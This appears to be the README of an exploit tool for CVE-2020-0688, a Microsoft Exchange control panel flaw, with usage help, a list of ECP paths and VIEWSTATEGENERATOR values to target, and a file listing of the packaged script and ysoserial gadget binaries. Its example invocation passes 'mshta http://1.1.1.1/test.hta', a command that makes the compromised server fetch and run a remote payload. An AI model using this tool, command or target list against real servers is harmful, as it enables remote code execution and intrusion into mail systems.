CVE-2020-0688_EXP Auto trigger payload & encrypt method# CVE-2020-0688_EXP
CVE-2020-0688_EXP Auto trigger payload
```
python3 CVE-2020-0688_EXP.py -h
usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e]
optional arguments:
-h, --help show this help message and exit
-s SERVER, --server ECP Server URL Example: http://ip/owa
-u USER, --user USER login account Example: domain\user
-p PASSWORD, --password PASSWORD
-c CMD, --cmd CMD Command u want to execute
-e, --encrypt Encrypt the payload
```
example:
```
python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u user@x.com -p passwd -c "mshta http://1.1.1.1/test.hta"
```
Other available paths:
```
/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/Organize/AutomaticReplies.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/RulesEditor/InboxRules.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Organize/DeliveryReports.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/MyGroups/PersonalGroups.aspx?showhelp=false&__VIEWSTATEGENERATOR=A767F62B
/ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&id=38f4bec5-704f-4272-a654-95d53150e2ae&ReturnObjectType=1&__VIEWSTATEGENERATOR=321473B8
/ecp/Customize/Messaging.aspx?showhelp=false&__VIEWSTATEGENERATOR=9C5731F0
/ecp/Customize/General.aspx?showhelp=false&__VIEWSTATEGENERATOR=72B13321
/ecp/Customize/Calendar.aspx?showhelp=false&__VIEWSTATEGENERATOR=4AD51055
/ecp/Customize/SentItems.aspx?showhelp=false& __VIEWSTATEGENERATOR=4466B13F
/ecp/PersonalSettings/Password.aspx?showhelp=false&__VIEWSTATEGENERATOR=59543DCA
/ecp/SMS/TextMessaging.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/TroubleShooting/MobileDevices.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Customize/Regional.aspx?showhelp=false&__VIEWSTATEGENERATOR=9097CD08
/ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&ReturnObjectType=1__VIEWSTATEGENERATOR=FD338EE0
/ecp/Security/BlockOrAllow.aspx?showhelp=false&__VIEWSTATEGENERATOR=362253EF
```
[4.0K] /data/pocs/c2068dc84c3ca17c10fb13446b0cf3202e204d2f
├── [4.7K] CVE-2020-0688_EXP.py
├── [2.1K] README.md
└── [4.0K] ysoserial-1.32
├── [ 44K] fastjson.dll
├── [1.3M] FSharp.Core.dll
├── [605K] FSharp.Core.xml
├── [8.5K] FsPickler.CSharp.dll
├── [ 14K] FsPickler.CSharp.xml
├── [947K] FsPickler.dll
├── [ 68K] FsPickler.Json.dll
├── [6.0K] FsPickler.Json.xml
├── [129K] FsPickler.xml
├── [1.1M] microsoft.identitymodel.dll
├── [1.3M] Microsoft.PowerShell.Editor.dll
├── [ 22K] NDesk.Options.dll
├── [638K] Newtonsoft.Json.dll
├── [658K] Newtonsoft.Json.xml
├── [5.7M] System.Management.Automation.dll
├── [198K] YamlDotNet.dll
├── [242K] YamlDotNet.xml
├── [133K] ysoserial.exe
└── [ 540] ysoserial.exe.config
1 directory, 21 files